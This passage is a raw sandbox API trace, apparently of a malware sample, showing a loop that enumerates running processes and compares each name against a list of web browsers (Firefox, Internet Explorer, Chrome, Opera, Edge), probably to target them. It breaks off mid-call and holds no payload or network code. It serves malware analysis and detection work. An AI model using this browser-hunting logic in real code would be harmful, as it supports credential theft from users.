th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.765] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0230.765] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0230.765] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0230.765] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0230.765] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.765] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0230.765] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0230.765] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0230.765] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0230.766] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0230.766] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.766] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.766] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0230.766] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0230.766] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0230.766] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0230.766] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.766] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0230.767] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0230.767] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0230.767] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0230.767] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0230.767] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.767] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0230.767] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0230.767] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0230.767] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0230.767] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0230.767] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.767] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0230.768] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0230.768] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0230.768] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0230.768] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0230.768] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.768] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0230.768] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0230.768] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0230.768] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0230.768] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0230.768] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.768] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0230.769] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0230.769] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0230.769] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0230.769] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0230.769] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.769] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0230.770] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0230.770] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0230.770] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0230.770] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0230.770] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.770] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0230.770] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0230.770] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0230.770] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0230.770] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0230.770] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.770] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0230.771] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0230.771] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0230.771] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0230.771] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0230.771] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.771] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0230.771] CloseHandle (hObject=0xe8) returned 1 [0230.771] Sleep (dwMilliseconds=0x3e8) [0231.778] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0231.779] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.780] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0231.780] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0231.780] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0231.780] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0231.780] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0231.780] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0231.780] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0231.781] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0231.781] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0231.781] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0231.781] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0231.781] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0231.781] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0231.781] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0231.781] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0231.781] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0231.781] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.781] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0231.782] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0231.782] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0231.782] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0231.782] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0231.782] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.782] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0231.782] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0231.782] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0231.782] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0231.782] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0231.782] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.782] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0231.783] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0231.783] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0231.783] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0231.783] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0231.783] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.783] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0231.783] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0231.784] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0231.784] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0231.784] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0231.784] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.784] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0231.784] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0231.784] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0231.784] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0231.784] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0231.784] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.784] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0231.785] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0231.785] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0231.785] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0231.785] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0231.785] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.785] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0231.785] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0231.785] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0231.785] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0231.785] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0231.785] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.785] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.786] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0231.786] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0231.786] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0231.786] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0231.786] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.786] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.786] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0231.787] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0231.787] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0231.787] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0231.787] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.787] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.787] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0231.787] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0231.787] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0231.787] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0231.787] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.787] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.788] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0231.788] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0231.788] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0231.788] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0231.788] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.788] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.788] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0231.788] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0231.788] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0231.788] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0231.788] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.788] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0231.789] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0231.789] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0231.789] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0231.789] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0231.789] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.789] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.789] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0231.789] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0231.790] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0231.790] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0231.790] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.790] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.790] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0231.790] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0231.790] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0231.790] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0231.790] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.790] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0231.791] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0231.791] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0231.791] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0231.791] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0231.791] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.791] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0231.791] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0231.791] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0231.791] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0231.791] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0231.791] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.791] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0231.792] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0231.792] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0231.792] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0231.792] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0231.792] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.792] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.792] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0231.792] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0231.792] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0231.792] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0231.793] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.793] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0231.793] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0231.793] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0231.793] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0231.793] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0231.793] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.793] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0231.794] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0231.794] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0231.795] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0231.795] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0231.795] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.795] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0231.796] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0231.796] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0231.796] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0231.796] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0231.796] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.796] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0231.796] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0231.796] lstrcmpiA 